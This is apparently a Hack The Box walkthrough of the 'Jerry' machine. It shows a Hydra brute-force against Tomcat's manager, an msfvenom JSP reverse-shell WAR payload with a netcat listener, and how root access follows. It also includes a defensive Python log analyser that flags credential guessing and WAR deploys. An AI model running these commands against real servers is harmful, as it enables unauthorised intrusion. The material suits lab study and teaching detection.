Hackthebox writeup for Jerry
What are WAR files? If an application allows us to upload such a file, can we create one and obtain a reverse shell through it?
An Nmap scan reveals that it’s an Apache Tomcat web server.
Tomcat is a web server and servlet container for hosting Java web applications.
Log in to the application and click on Server Status; it asks for authentication. The default credential “admin admin” works.
Next, we click on Manager => List Applications and get access denied.
To find out why we are getting the access denied error, we will use Burp Suite.
If we send the Authorization header to Decoder, it turns out that the application is trying to log in with admin admin. If you remove the header and forward the request, it works!
We’ll try to brute-force the password with Hydra, using SecLists as the wordlist.
find . | grep -i tomcat
hydra -C /usr/share/seclists/Passwords/../../betterdefaultpassists.txt http-get://10.10.10.95:8080/manager/html
The credentials are tomcat:secret
This gives us access to the application. There’s an option to upload a WAR file! Can we use this kind of file upload to get a reverse shell?
What is a WAR file?
A WAR file (Web Application Resource or Web application ARchive) is a file used to distribute a collection of Jar-files, Java Server Pages, Java Servlets, Java Classes, XML files and other resources that together constitute a web application.
It turns out that we can create such WAR files with msfvenom. Not only that, msfvenom can create payloads in various other formats; below is the list from the offsec page:
root@kali:~# msfvenom --help-formats
Executable formats
asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small,
hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection,
psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl,
powershell, ps1, py, python, raw, rb, ruby, sh,
Create the msfvenom payload using the command below.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4455 -f war > shell.war
Set up a netcat listener.
nc -nlvp 4455
Browse to the file from the browser.
Obtain the reverse shell:
The whoami command here returns an output that we can be very happy about. We are already root!
So, just grab the flag.
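Seen from the defender's side, the steps above (credential guessing against /manager/html, then a WAR upload through the Manager) leave a recognisable trail in Tomcat's access log. The following is an added example, not part of the original writeup: it assumes the AccessLogValve "common" pattern, a per-client threshold of five 401 responses with no time window, and log lines that are constructed for illustration.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")
FAIL_THRESHOLD = 5  # assumed tuning value: 401s per client before flagging

# Constructed sample log (not captured from a real host).
SAMPLE_LOG = "\n".join(
    # Six failed Basic-auth attempts in six seconds from one client.
    ['10.10.14.2 - - [01/Jan/2024:10:00:0%d +0000] "GET /manager/html HTTP/1.1" 401 2473' % i
     for i in range(6)]
    + [
        '10.10.14.2 - tomcat [01/Jan/2024:10:00:07 +0000] "GET /manager/html HTTP/1.1" 200 19000',
        '10.10.14.2 - tomcat [01/Jan/2024:10:01:30 +0000] '
        '"POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=CONSTRUCTED HTTP/1.1" 200 19500',
        # An administrator's browser: one 401 challenge, then a normal login.
        '10.10.10.20 - - [01/Jan/2024:11:00:00 +0000] "GET /manager/html HTTP/1.1" 401 2473',
        '10.10.10.20 - admin [01/Jan/2024:11:00:05 +0000] "GET /manager/html HTTP/1.1" 200 19000',
    ]
)

def analyze(log_text, threshold=FAIL_THRESHOLD):
    """Return {client_ip: sorted findings} for requests under /manager/."""
    failures = defaultdict(int)
    findings = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # skip lines that are not in the expected format
        ip, user, method, uri, status = m.groups()
        path = uri.split("?", 1)[0]
        if not path.startswith("/manager/"):
            continue
        if status == "401":
            failures[ip] += 1
            if failures[ip] >= threshold:
                findings[ip].add("credential-guessing")
        elif status.startswith("2"):
            if failures[ip] >= threshold:
                findings[ip].add("login-after-guessing:" + user)
            if method in ("POST", "PUT") and path in DEPLOY_PATHS:
                findings[ip].add("war-deploy:" + user)
    return {ip: sorted(found) for ip, found in findings.items()}

if __name__ == "__main__":
    for ip, found in analyze(SAMPLE_LOG).items():
        print(ip, found)
```

A single 401 followed by a 200 is normal for a browser answering the Basic-auth challenge, which is why the second client produces no finding; any WAR deploy is reported regardless of the threshold so it can be matched against change records.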
Skills that I learnt from this machine
To use Burp Suite for troubleshooting.
To create a JSP shell using msfvenom in WAR format and obtain a reverse shell from it.